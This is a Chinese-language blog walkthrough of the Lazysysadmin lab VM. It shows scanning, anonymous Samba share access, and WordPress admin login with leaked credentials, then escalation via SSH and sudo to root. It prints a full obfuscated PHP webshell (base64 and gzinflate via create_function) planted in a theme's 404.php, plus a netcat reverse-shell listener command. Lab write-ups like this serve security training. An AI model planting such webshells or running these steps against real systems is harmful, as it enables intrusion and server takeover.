靶机实战 - Lazysysadmin | Ankioの记事本

靶机链接: https://pan.baidu.com/s/1eLFOW0q8a9L553anRE20hA 提取码: 8820

攻击 IP（Kali） - 192.168.224.139

被攻击 IP(Lazysysadmin,通过主机发现) - 192.168.224.138

目标：拿到服务器 root 权限，并以 root 用户身份登录服务器

主机发现#

netdiscover -r 192.168.224.0/24

或者

nmap -sn 192.168.224.0/24

• 因为攻击机和被攻击机采用 net 模式连接网络，虚拟机网络设置里面可以看到 net 模式分配的 ip 段为 192.168.224.0/24,所以进行主机发现只要扫描该网段就行。

检查该 IP 开放端口,并进行服务识别#

nmap -v -A -T4 192.168.224.138

对扫描结果进行分析#

SSH 服务（22）#

• 可以考虑爆破，如果知道用户名的话，不知道也可以，但是非常浪费时间

WEB 服务（80）#

• 80 端口是 WEB 服务，robots.txt 规则中存在不允许访问的目录

• 访问这几个目录都没有发现有价值的信息
• 使用 dirb 工具进行目录扫描
• dirb http://192.168.224.138
• 扫描到以上目录信息
• 先访问一下 info.php,是一个 phpinfo 信息泄露
• 接着访问 wordpress,一直提示博主叫 togie

• 那么刚才 ssh 部分用户名就很有可能是 togie 了，或者其他登录服务的用户名是 togie 了

• 看见署名为 admin，猜测后台账号可能是 admin

• 尝试访问 wordpress 后台路径(刚才扫描出来了)http://192.168.224.138/wordpress/wp-admin

• 尝试爆破~失败

• 访问 http://192.168.224.138/phpmyadmin/,是数据库管理工具，懒得爆破了

Samba 服务（139,445）#

• 使用 enum4linux 枚举 samba 主机信息

• 发现允许任意用户登录

• 发现存在共享目录与打印机

• 远程挂载共享目录 sudo mount -t cifs -o username="",password="" //192.168.224.138/share$ /mnt

• 挂载的是网站目录

• 找到了 wp-config.php 文件

• 发现数据库账号和密码

• 尝试直接往里面挂大马，发现没有写入权限，只得从数据库下手了

• 从刚才找到的 phpmyadmin 登录

• 虽然登录成功，但是没有权限

• 尝试登录用户后台...居然成功了...

• 登录成功后，把这个页面设置成了中文~看着舒服

• 然后尝试写个大马，wp 允许编辑 php 文件来编辑主题，研究了半天觉得还是 404 页面靠谱

  <?php
  $password='admin';//登录密码
  
  
  $html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/
  

• 理论上访问一个不存在的页面就应该直接 404，但是可能由于我整个 php 重写的大马导致 404 没有成功，

• 不过通过刚才挂载的目录可以找到模板目录的绝对路径

• 访问模板目录 http://192.168.224.138/wordpress/wp-content/themes/twentyfifteen/404.php

• 成功访问大马

• 登录后使用大马反弹 shell

• kali 监听 nc -nvlp 1234

• 大马反弹 shell

• 连接成功

  使用 python -c 'import pty; pty.spawn("/bin/bash")' 切换 bash 面板(为了好看)

• 看了一下用户权限：www-data

• 并非 root 权限，看一下密码文件所需权限，好吧，root

• 此路不通，回头再看看共享文件夹，发现了一个密码

• 好像是部署服务器后忘了删除，尝试 ssh 登录，之前不是知道了一个疑似的账号 togie 嘛~

• 登录成功

• 先看权限，发现这个账户在 sudo 用户组，直接切换到 root 用户 sudo su root

• 修改 root 密码

• 使用 root 用户登录

到此渗透完成

总结#

这个靶机设计地不够好，有以下几点：

1. togie 用户的密码应该设计地更加复杂，不能被爆破
2. togie 用户的密码文件应该放在只有登录 www-data 用户才能读取的文件夹，而不是放在共享文件夹